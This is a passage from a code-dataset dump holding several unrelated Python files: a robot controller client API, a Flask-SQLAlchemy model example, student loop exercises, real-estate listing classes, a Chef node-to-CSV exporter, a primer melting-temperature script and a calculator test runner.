timeout=10, **kwargs):\n taskparameters = {'command': 'ReloadModule'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def ShutdownRobotBridge(self, timeout=10, **kwargs):\n taskparameters = {'command': 'ShutdownRobotBridge'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def GetRobotBridgeState(self, timeout=10, **kwargs):\n taskparameters = {'command': 'GetRobotBridgeState'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def ClearRobotBridgeError(self, timeout=10, usewebapi=None, **kwargs):\n taskparameters = {\n 'command': 'ClearRobotBridgeError',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout, usewebapi=usewebapi)\n\n def SetRobotBridgePause(self, timeout=10, **kwargs):\n taskparameters = {'command': 'SetRobotBridgePause'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def SetRobotBridgeResume(self, timeout=10, **kwargs):\n taskparameters = {'command': 'SetRobotBridgeResume'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n #\n # jogging related\n #\n def SetJogModeVelocities(self, movejointsigns, robotname=None, toolname=None, robotspeed=None, robotaccelmult=None, canJogInCheckMode=None, usewebapi=False, timeout=1, fireandforget=False, **kwargs):\n \"\"\"\n :param jogtype: One of 'joints', 'world', 'robot', 'tool'\n :param canJogInCheckMode: if true, then allow jogging even if in check mode. By default it is false.\n :param checkSelfCollisionWhileJogging:\n :param force:\n :param robotname:\n :param toolname:\n :param robotspeed:\n :param robotaccelmult:\n \"\"\"\n taskparameters = {\n 'command': 'SetJogModeVelocities',\n 'movejointsigns': movejointsigns,\n }\n if canJogInCheckMode is not None:\n taskparameters['canJogInCheckMode'] = canJogInCheckMode\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, toolname=toolname, robotspeed=robotspeed, robotaccelmult=robotaccelmult, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n\n def EndJogMode(self, usewebapi=False, timeout=1, fireandforget=False, **kwargs):\n taskparameters = {\n 'command': 'EndJogMode',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n\n def SetRobotBridgeServoOn(self, servoon, robotname=None, timeout=3, fireandforget=False):\n taskparameters = {\n 'command': 'SetRobotBridgeServoOn',\n 'isservoon': servoon\n }\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, fireandforget=fireandforget)\n\n def SetRobotBridgeLockMode(self, islockmode, robotname=None, timeout=3, fireandforget=False):\n taskparameters = {\n 'command': 'SetRobotBridgeLockMode',\n 'islockmode': islockmode\n }\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, fireandforget=fireandforget)\n\n def ResetSafetyFault(self, timeout=3, fireandforget=False):\n taskparameters = {\n 'command': 'ResetSafetyFault',\n }\n return self.ExecuteCommand(taskparameters, timeout=timeout, fireandforget=fireandforget)\n\n def SetRobotBridgeControlMode(self, controlMode, timeout=3, fireandforget=False):\n taskparameters = {\n 'command': 'SetRobotBridgeControlMode',\n 'controlMode': controlMode\n }\n return self.ExecuteCommand(taskparameters, timeout=timeout, fireandforget=fireandforget)\n\n def GetDynamicObjects(self, usewebapi=False, timeout=1, **kwargs):\n \"\"\"Get a list of dynamically added objects in the scene, from vision detection and physics simulation.\n \"\"\"\n taskparameters = {\n 'command': 'GetDynamicObjects',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def ComputeRobotConfigsForGraspVisualization(self, targetname, graspname, robotname=None, toolname=None, unit='mm', usewebapi=False, timeout=10, **kwargs):\n '''returns robot configs for grasp visualization\n '''\n taskparameters = {\n 'command': 'ComputeRobotConfigsForGraspVisualization',\n 'targetname': targetname,\n 'graspname': graspname\n }\n if unit is not None:\n taskparameters['unit'] = unit\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, toolname=toolname, usewebapi=usewebapi, timeout=timeout)\n\n def ResetCacheTemplates(self, usewebapi=False, timeout=1, fireandforget=False, **kwargs):\n \"\"\"resets any cached templates\n \"\"\"\n taskparameters = {\n 'command': 'ResetCacheTemplates',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n\n def SetRobotBridgeExternalIOPublishing(self, enable, usewebapi=False, timeout=2, fireandforget=False, **kwargs):\n \"\"\"enables publishing collision data to the robotbridge\n \"\"\"\n taskparameters = {\n 'command': 'SetRobotBridgeExternalIOPublishing',\n 'enable': bool(enable)\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n \n def SetIgnoreObjectsFromUpdateWithPrefix(self, prefixes, usewebapi=False, timeout=2, fireandforget=False, **kwargs):\n \"\"\"enables publishing collision data to the robotbridge\n \n :prefixes: list of strings describing the prefix of the instobject names. If prefix ends with a '$', then it is has to match to the end (ie the whole name)\n \"\"\"\n taskparameters = {\n 'command': 'SetIgnoreObjectsFromUpdateWithPrefix',\n 'prefixes': prefixes\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n \n def RestoreSceneInitialState(self, usewebapi=None, timeout=1, **kwargs):\n \"\"\"restore scene to the state on filesystem\n \"\"\"\n taskparameters = {\n 'command': 'RestoreSceneInitialState',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n #\n # Motor test related.\n #\n\n def RunMotorControlTuningFrequencyTest(self, jointName, amplitude, freqMin, freqMax, timeout=10, usewebapi=False, **kwargs):\n \"\"\"runs frequency test on specified joint and returns result\n \"\"\"\n taskparameters = {\n 'command': 'RunMotorControlTuningFrequencyTest',\n 'jointName': jointName,\n 'freqMin': freqMin,\n 'freqMax': freqMax,\n 'amplitude': amplitude,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def RunMotorControlTuningStepTest(self, jointName, amplitude, timeout=10, usewebapi=False, **kwargs):\n \"\"\"runs step response test on specified joint and returns result\n \"\"\"\n taskparameters = {\n 'command': 'RunMotorControlTuningStepTest',\n 'jointName': jointName,\n 'amplitude': amplitude,\n }\n taskparameters.update(kwargs)\n log.warn('sending taskparameters=%r', taskparameters)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def RunMotorControlTuningMaximulLengthSequence(self, jointName, amplitude, timeout=10, usewebapi=False, **kwargs):\n \"\"\"runs maximum length sequence test on specified joint and returns result\n \"\"\"\n taskparameters = {\n 'command': 'RunMotorControlTuningMaximulLengthSequence',\n 'jointName': jointName,\n 'amplitude': amplitude,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def RunDynamicsIdentificationTest(self, timeout, usewebapi=False, **kwargs):\n taskparameters = dict()\n taskparameters['command'] = 'RunDynamicsIdentificationTest'\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def GetTimeToRunDynamicsIdentificationTest(self, usewebapi=False, timeout=10, **kwargs):\n taskparameters = dict()\n taskparameters['command'] = 'GetTimeToRunDynamicsIdentificationTest'\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def GetInertiaChildJointStartValues(self, usewebapi=False, timeout=10, **kwargs):\n taskparameters = dict()\n taskparameters['command'] = 'GetInertiaChildJointStartValues'\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def CalculateTestRangeFromCollision(self, usewebapi=False, timeout=10, **kwargs):\n taskparameters = dict()\n taskparameters['command'] = 'CalculateTestRangeFromCollision'\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n # def RunDynamicsIdentificationInertiaTest(self):\n # # TODO\n # pass\n\n # def RunDynamicsIdentificationCenterOfMassTest(self):\n # # TODO\n # pass\n\n def GetMotorControlParameterSchema(self, usewebapi=False, timeout=10, **kwargs):\n \"\"\"Gets motor control parameter schema\n \"\"\"\n taskparameters = {\n 'command': 'GetMotorControlParameterSchema',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def GetMotorControlParameter(self, jointName, parameterName, usewebapi=False, timeout=10, **kwargs):\n \"\"\"Gets motor control parameters as name-value dict\n \"\"\"\n taskparameters = {\n 'command': 'GetMotorControlParameter',\n 'jointName': jointName,\n 'parameterName': parameterName,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def GetMotorControlParameters(self, usewebapi=False, timeout=10, **kwargs):\n \"\"\"Gets cached motor control parameters as name-value dict\n \"\"\"\n taskparameters = {\n 'command': 'GetMotorControlParameters',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def SetMotorControlParameter(self, jointName, parameterName, parameterValue, timeout=10, usewebapi=False, **kwargs):\n \"\"\"Sets motor control parameter\n \"\"\"\n taskparameters = {\n 'command': 'SetMotorControlParameter',\n 'jointName': jointName,\n 'parameterName': parameterName,\n 'parameterValue': parameterValue,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def IsProfilingRunning(self, timeout=10, usewebapi=False):\n \"\"\"Queries if profiling is running on planning\n \"\"\"\n return self.ExecuteCommand({'command': 'IsProfilingRunning'}, usewebapi=usewebapi, timeout=timeout)\n\n def StartProfiling(self, timeout=10, usewebapi=False, clocktype='cpu'):\n \"\"\"Start profiling planning\n \"\"\"\n return self.ExecuteCommand({'command': 'StartProfiling', 'clocktype': clocktype}, usewebapi=usewebapi, timeout=timeout)\n\n def StopProfiling(self, timeout=10, usewebapi=False):\n \"\"\"Stop profiling planning\n \"\"\"\n return self.ExecuteCommand({'command': 'StopProfiling'}, usewebapi=usewebapi, timeout=timeout)\n \n def SyncGrabbingTargetState(self, timeout=10, usewebapi=False, fireandforget=False, **kwargs):\n \"\"\"Syncs isGrabbingTarget signal from robotbridges with the internal planning grabbing client.\n \"\"\"\n taskparameters = {\n 'command': 'SyncGrabbingTargetState',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n","sub_path":"python/mujincontrollerclient/realtimerobotclient.py","file_name":"realtimerobotclient.py","file_ext":"py","file_size_in_byte":43958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"67716505","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///onetomany.db'\n\ndb = SQLAlchemy(app)\n\n# one-to-many relationship person and pet\nclass Person(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(20))\n pets = db.relationship('Pet', backref='owner') \n # When using relationship use the model name\n\nclass Pet(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(20))\n owner_id = db.Column(db.Integer, db.ForeignKey('person.id')) \n # When using ForeignKey use the table name\n","sub_path":"sqlalchemy-relationships/onetomany.py","file_name":"onetomany.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"323354251","text":"#Review - #3.1\n\n#3.1 - For Loops \n#e) good example\nfor posIntegersUnderHundred in range(100,0,-10): #incriments by decreasing by 10, starting at 100\n print(posIntegersUnderHundred) #Goes over 9 times (if end value was -1, would stop at 0\n\n#f) incorporating try and except \nblastOff = True \nwhile blastOff == True: #if except is run, goes back to while loop \n try: #if try is not true, and data type is incorrect, goes to except \n countdownTimer = int(input(\"Enter time to countdown to: \"))\n for countdown in range(countdownTimer,-1,-1): #Have to use -1 to count down to 0 and print statement afterward \n print(countdown)\n print(\"Blast off!\")\n blastOff = False\n except:\n print(\"You must enter a number\")\n\n\n#Different values for for loops \nm = int(input(\"Enter the starting value: \"))\nn = int(input(\"Enter the ending value: \"))\ns = int(input(\"Enter the step count: \"))\n\n\nfor userCount in range(m,n,s):\n print(userCount)\n\n\nif m < n: \n for userCount in range(m,n,s):\n print(userCount)\nelif m > n:\n for userCount in range(n,m,s):\n print(userCount)\nelse:\n print(\"You have entered an incorrect step count\")\n\n \n\n\nnumber = int(input(\"Enter a number to multiply by: \"))\n\nfor i in range(1,13):\n print(i, \"x\", number, \"=\", (i * number))\n\n\n\n#For Loops - Day 2 and 3 - Accumlation\n\nfor x in range(1,101):\n numberDivisible = x % 17 #Isn't true until x = 17 (eg) 36 remainder of 17 = 36-34 = 2\n #therefore, not true that remainder is 0 \n if numberDivisible == 0: #if remainder is zero, the number can be evenly dividied \n print(x,end=\" \")\n\n\n#Exercise 1 - Grocery Items and (try Average Grades, E2)\nprint(\"\\n\")\ntotal = 0\ncostItem = 0\nitemsAmount = 0 \n\ngroceries = True\nwhile groceries == True:\n try: #checks if a number is used for items, if not, prints execept condition and loops \n itemsAmount = int(input(\"Enter the amount of items on your grocery bill: \"))\n for x in range(1, (itemsAmount + 1)):\n costItem = float(input(\"Enter the cost of the item which is:\" ))\n total = costItem + total\n print(total)\n if x == (itemsAmount):\n groceries == False\n break\n except:\n print(\"You must enter a number\")\nprint(\"The total cost of your groceries is\", total)\n\n#Exercise 3.1 - Day 3 - For Loops 1, a,b, 4 - c\n#a)\ncountFactors = 0\nprime = False\ninteger = int(input(\"Enter a number between 1 and 50: \"))\nfor i in range(1,50):\n integerFactored = integer % i\n if integerFactored == 0: #Just trying to see remainder of integer as 0\n print(integer, \"can be factored by\", i)\n prime = False\n countFactors += 1\nif countFactors <= 2: #If the number can only be factored by two numbers ie) itself and 1, the number is a prime number\n prime = True\n#b)\nif prime == True:\n print(integer,\"is a prime number.\")\nelif prime == False:\n print(integer, \"is not a prime number.\")\n\n\n#b) Fibonanci -- Good practice!\nprevious = 0\nsumOfNum = 1\nnewNum = 0 \n\nnumbersInFib = int(input(\"Enter the amount of numbers of the sequence of Fibonacci to output: \"))\n\n#in order to avoid duplicate of each number, divide by two\nnumbersInFibRemainder = numbersInFib / 2 #check to see if number is even or not\nif (numbersInFib % 2) != 0:\n print(sumOfNum) #if not even, can print extra number to add to proper numbersInFib amount \n\nnumbersInFib = numbersInFib // 2 #since printing twice, only need half expected numbers \nfor amount in range(int(numbersInFib)):\n newNum = previous + sumOfNum\n previous += sumOfNum #two seperate sequencial fib caluations taking place at once, same results, one stores as the previous number, while the other stores as next number \n print(newNum)\n sumOfNum = previous + sumOfNum #creates next following fib number by add previous two nums\n print(sumOfNum) \n","sub_path":"Computer Science/Unit 3 - CS/Review/3.1-Review-Lessons1-2.py","file_name":"3.1-Review-Lessons1-2.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"480034696","text":"def get_valid_input(input_string, valid_options):\n input_string += \" ({}) \".format(\", \".join(valid_options))\n\n response = input(input_string)\n while response.lower() not in valid_options:\n response = input(input_string)\n return response\n\n\nclass Property:\n \"\"\"Class which represents Property\"\"\"\n\n def __init__(self, square_feet='', beds='',\n baths='', **kwargs):\n \"\"\"Initialized the object\"\"\"\n # super().__init__(**kwargs)\n self.square_feet = square_feet\n self.num_bedrooms = beds\n self.num_baths = baths\n\n def display(self):\n \"\"\"Print all information about the object\"\"\"\n print(\"PROPERTY DETAILS\")\n print(\"================\")\n print(\"square footage: {}\".format(self.square_feet))\n print(\"bedrooms: {}\".format(self.num_bedrooms))\n print(\"bathrooms: {}\".format(self.num_baths))\n print()\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n return dict(square_feet=input(\"Enter the square feet: \"),\n beds=input(\"Enter number of bedrooms: \"),\n baths=input(\"Enter number of baths: \"))\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass Apartment:\n \"\"\"Class which represents Apartment\"\"\"\n valid_laundries = (\"coin\", \"ensuite\", \"none\")\n valid_balconies = (\"yes\", \"no\", \"solarium\")\n\n def __init__(self, balcony='', laundry='', **kwargs):\n \"\"\"Initialized the object\"\"\"\n self.property = Property(**kwargs)\n self.balcony = balcony\n self.laundry = laundry\n\n def display(self):\n \"\"\"Print all information about the object\"\"\"\n self.property.display()\n print(\"APARTMENT DETAILS\")\n print(\"laundry: %s\" % self.laundry)\n print(\"has balcony: %s\" % self.balcony)\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n\n parent_init = Property.prompt_init()\n laundry = ''\n while laundry.lower() not in \\\n Apartment.valid_laundries:\n laundry = input(\"What laundry facilities does \"\n \"the property have? ({})\".format(\n \", \".join(Apartment.valid_laundries)))\n\n balcony = ''\n while balcony.lower() not in \\\n Apartment.valid_balconies:\n balcony = input(\n \"Does the property have a balcony? \"\n \"({})\".format(\", \".join(Apartment.valid_balconies)))\n parent_init.update({\n \"laundry\": laundry,\n \"balcony\": balcony\n })\n return parent_init\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass House:\n \"\"\"Class which represents House\"\"\"\n valid_garage = (\"attached\", \"detached\", \"none\")\n valid_fenced = (\"yes\", \"no\")\n\n def __init__(self, num_stories='',\n garage='', fenced='', **kwargs):\n \"\"\"Initialized the object\"\"\"\n self.property = Property(**kwargs)\n\n self.garage = garage\n self.fenced = fenced\n self.num_stories = num_stories\n\n def display(self):\n \"\"\"Print all information about the object\"\"\"\n self.property.display()\n print(\"HOUSE DETAILS\")\n print(\"# of stories: {}\".format(self.num_stories))\n print(\"garage: {}\".format(self.garage))\n print(\"fenced yard: {}\".format(self.fenced))\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n parent_init = Property.prompt_init()\n fenced = get_valid_input(\"Is the yard fenced? \",\n House.valid_fenced)\n garage = get_valid_input(\"Is there a garage? \",\n House.valid_garage)\n num_stories = input(\"How many stories? \")\n parent_init.update({\n \"fenced\": fenced,\n \"garage\": garage,\n \"num_stories\": num_stories\n })\n return parent_init\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass Purchase:\n \"\"\"Class which represents Purchase\"\"\"\n\n def __init__(self, price='', taxes='', **kwargs):\n \"\"\"Initialized the object\"\"\"\n # super().__init__(**kwargs)\n self.price = price\n self.taxes = taxes\n\n def display(self):\n \"\"\"Print all information about the object\"\"\"\n # super().display()\n print(\"PURCHASE DETAILS\")\n print(\"selling price: {}\".format(self.price))\n print(\"estimated taxes: {}\".format(self.taxes))\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n return dict(\n price=input(\"What is the selling price? \"),\n taxes=input(\"What are the estimated taxes? \"))\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass Rental:\n \"\"\"Class which represents Rental\"\"\"\n\n def __init__(self, furnished='', utilities='',\n rent='', **kwargs):\n \"\"\"Initialized the object\"\"\"\n # super().__init__(**kwargs)\n self.furnished = furnished\n self.rent = rent\n self.utilities = utilities\n\n def display(self):\n \"\"\"Print all information about the object\"\"\"\n # super().display()\n print(\"RENTAL DETAILS\")\n print(\"rent: {}\".format(self.rent))\n print(\"estimated utilities: {}\".format(\n self.utilities))\n print(\"furnished: {}\".format(self.furnished))\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n return dict(\n rent=input(\"What is the monthly rent? \"),\n utilities=input(\n \"What are the estimated utilities? \"),\n furnished=get_valid_input(\n \"Is the property furnished? \",\n (\"yes\", \"no\")))\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass ApartmentRental():\n \"\"\"\n Represents information about an apartment which be rented\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialized an object\"\"\"\n self.rental = Rental(**kwargs)\n self.apartment = Apartment(**kwargs)\n\n def display(self):\n \"\"\"\n Print all information\n \"\"\"\n self.apartment.display()\n self.rental.display()\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n init = Apartment.prompt_init()\n init.update(Rental.prompt_init())\n return init\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass HouseRental():\n \"\"\"\n Represents information about a house which be rented\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialized an object\"\"\"\n self.rental = Rental(**kwargs)\n self.house = House(**kwargs)\n\n def display(self):\n \"\"\"\n Print all information\n \"\"\"\n self.house.display()\n self.rental.display()\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n init = House.prompt_init()\n init.update(Rental.prompt_init())\n return init\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass ApartmentPurchase():\n \"\"\"\n Represents information about an apartment which be purchased\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialized an object\"\"\"\n self.purchase = Purchase(**kwargs)\n self.apartment = Apartment(**kwargs)\n\n def display(self):\n \"\"\"\n Print all information\n \"\"\"\n self.apartment.display()\n self.purchase.display()\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n init = Apartment.prompt_init()\n init.update(Purchase.prompt_init())\n return init\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass HousePurchase:\n \"\"\"\n Represents information about an house which be purchased\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialized an object\"\"\"\n self.purchase = Purchase(**kwargs)\n self.house = House(**kwargs)\n\n def display(self):\n \"\"\"\n Print all information\n \"\"\"\n self.house.display()\n self.purchase.display()\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n init = House.prompt_init()\n init.update(Purchase.prompt_init())\n return init\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass Agent:\n \"\"\"\n Class for Agent representation\n \"\"\"\n type_map = {\n (\"house\", \"rental\"): HouseRental,\n (\"house\", \"purchase\"): HousePurchase,\n (\"apartment\", \"rental\"): ApartmentRental,\n (\"apartment\", \"purchase\"): ApartmentPurchase\n }\n\n def __init__(self):\n self.property_list = []\n self.client_dict = {(\"house\", \"rental\"): [],\n (\"house\", \"purchase\"): [],\n (\"apartment\", \"rental\"): [],\n (\"apartment\", \"purchase\"): []}\n\n def display_properties(self):\n \"\"\"\n Print all information about properties\n \"\"\"\n for property in self.property_list:\n property.display()\n\n def add_property(self):\n \"\"\"\n Add properties to property list\n \"\"\"\n property_type = get_valid_input(\n \"What type of property? \",\n (\"house\", \"apartment\")).lower()\n\n payment_type = get_valid_input(\n \"What payment type? \",\n (\"purchase\", \"rental\")).lower()\n property_class = self.type_map[\n (property_type, payment_type)]\n init_args = property_class.prompt_init()\n self.property_list.append(property_class(**init_args))\n self.inform_clients((property_type, payment_type))\n\n def find_interested_property(self):\n \"\"\"\n Find better property for client\n \"\"\"\n property_type = get_valid_input(\n \"What type of property you want to find? \",\n (\"house\", \"apartment\")).lower()\n\n payment_type = get_valid_input(\n \"What payment type you want to find? \",\n (\"purchase\", \"rental\")).lower()\n property_class = self.type_map[\n (property_type, payment_type)]\n\n for property in self.property_list:\n if isinstance(property, property_class):\n property.display()\n\n answer = get_valid_input(\n \"Do you want to leave your contact information\" +\n \"and we called you when we find the property,\\n\" +\n \"which can be interested for you?\", (\"yes\", \"no\"))\n if answer == \"yes\":\n contacts = input(\"Write them down, please: \")\n self.client_dict[(property_type, payment_type)].append(\n contacts)\n else:\n print(\"Thank you, goodbye\")\n\n def inform_clients(self, type_clients):\n print()\n if len(self.client_dict[type_clients]) != 0:\n print(\"If it were a real system,\",\n \" it would notify a person with these contact details:\")\n for i in self.client_dict[type_clients]:\n print(\"notify \", i)\n print(\"That's all\")\n","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":11259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"573043451","text":"#!/usr/bin/env python2.7\nfrom __future__ import print_function\n\nimport argparse\nimport chef\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nimport csv\nfrom itertools import izip_longest\nfrom operator import methodcaller\nimport signal\nimport sys\n\nCHEF_NODES = \"\"\"\nmyserver-1234\nnodename-999\ndb01\ndb02\n\"\"\".split()\n\nCHEF_ATTRIBUTES = \"\"\"\nname\nchef_environment\nrun_list\n\nfqdn\nuptime\nhostname\nnetwork.default_gateway\nnetwork.ipaddress_eth0\nnetwork.ipaddress_eth1\nec2.public_ipv4\nmy.super.cool.attribute\n\"\"\".split()\n\nWORKER_COUNT = 32\n\n\ndef tryget(collection, key_path):\n \"\"\"\n This function takes an array of keys\n and chains .get calls to a dict-like collection\n\n It'll return None if it gets a KeyError\n \"\"\"\n if not isinstance(collection, dict):\n raise Exception('collection should be a dict. got {}'.format(type(collection)))\n # pychef treats these attributes differently :(\n if key_path[0] not in ['name', 'chef_environment', 'run_list']:\n collection = collection['automatic']\n\n collection_keys = [collection] + key_path\n\n try:\n item = reduce(lambda coll, key: methodcaller('__getitem__', key)(coll),\n collection_keys)\n return item\n except KeyError:\n return\n\n\n# Lifted from the itertools docs\ndef grouper(iterable, n, fillvalue=None):\n args = [iter(iterable)] * n\n return izip_longest(fillvalue=fillvalue, *args)\n\n\ndef transform_chef_data(search_futures, chef_attrs=CHEF_ATTRIBUTES):\n \"\"\"\n Given a list of chef.Search futures,\n yield {chef_attribute: value} for each row matched\n \"\"\"\n # as_completed will yield completed futures as they finish\n for chef_search in as_completed(search_futures):\n for search_row in chef_search.result(timeout=3):\n yield {attr: tryget(search_row, attr.split('.'))\n for attr in chef_attrs}\n\n\ndef writecsv(chef_data, csvfile, headers=CHEF_ATTRIBUTES):\n \"\"\"\n Given a filename and a list of {column: field} rows,\n write the results to a csv file\n \"\"\"\n writer = csv.DictWriter(csvfile, fieldnames=headers, lineterminator='\\n')\n writer.writeheader()\n try:\n map(writer.writerow, chef_data)\n except Exception as e:\n print(e)\n raise\n\n\ndef signal_handler(sig, frame):\n print('Aborting!')\n sys.exit(1)\n\n\ndef parse_args(args):\n argp = argparse.ArgumentParser()\n argp.add_argument('filename')\n argp.add_argument('-C', '--workers', default=WORKER_COUNT)\n argp.add_argument('--chunks', default=1)\n return argp.parse_args(args)\n\n\ndef fetch_chef_data(num_workers, chunks):\n chef_api = chef.autoconfigure()\n assert chef_api, 'Failed to create chef_api object'\n\n with ThreadPoolExecutor(max_workers=num_workers) as executor:\n chef_searches = [executor.submit(chef.Search,\n index='node',\n q=query,\n api=chef_api)\n # Chunk up the work to distribute to our threads\n for chunk in grouper(CHEF_NODES, chunks)\n # Build queries from the node chunks\n # eg. \"name:chefnode OR name:othernode OR db01\"\n for query in [' OR '.join(['name:{}'.format(name)\n for name in chunk])]]\n return chef_searches\n\n\ndef main():\n args = parse_args(sys.argv[1:])\n\n signal.signal(signal.SIGINT, signal_handler)\n\n # Return a list of Futures storing the results of our Chef searches\n chef_searches = fetch_chef_data(args.workers, args.chunks)\n # Pass the list of Futures into our data-massaging functions\n transformed_chef_data = transform_chef_data(chef_searches)\n # finally, write those things into a csv\n with open(args.filename, 'w') as fh:\n writecsv(transformed_chef_data, fh)\n\n print('done!')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"chef_schlepper.py","file_name":"chef_schlepper.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"553802663","text":"#!/usr/bin/env python\n\nimport sys\nfrom Bio.SeqUtils import molecular_weight\nfrom Bio.SeqUtils import MeltingTemp as mt\n\nprint(\"python: \" + sys.version, end=\"\\n\", file=sys.stderr)\nprint(sys.argv[1], end=\"\\n\", file=sys.stderr)\n\nwith open(sys.argv[1]) as file:\n for line in file:\n row = line.rstrip('\\n').split(\"\\t\")\n seq = row[3]\n\n if seq == 'cdna':\n row.extend([\"tm_nn\", \"tm_gc\", \"tm_wallace\"])\n print(\",\".join(row))\n\n else:\n mw = molecular_weight(seq, 'DNA', False)\n\n row.append('%0.2f' % mt.Tm_NN(seq))\n row.append('%0.2f' % mt.Tm_GC(seq))\n row.append('%0.2f' % mt.Tm_Wallace(seq))\n\n print(\",\".join(row))\n","sub_path":"aso-design/script/calculate_props.py","file_name":"calculate_props.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"650619385","text":"#!/usr/bin/python2\nfrom calculator import Calculator\nfrom sys import stdout\n\ndef\tmtests(mfilename, comparator):\n\tprint(\"Testing \" + mfilename)\n\tmcalc = Calculator([])\n\tf = open(mfilename, \"r\")\n\tfor line in f:\n\t\tline = line.rstrip()\n\t\tstdout.write(\".\")\n\t\tmres = mcalc.validate_expression(line)\n\t\tif mres != comparator:\n\t\t\tprint(\"ERROR! : [\" + line + \"] this expression should be \" + str(comparator) + \"!\")\n\tf.close()\n\tprint(\"\\nEnd\\n\")\n\nif __name__ == \"__main__\":\n\tmtests(\"invalid_expressions\", False)\n\tmtests(\"valid_expressions\", 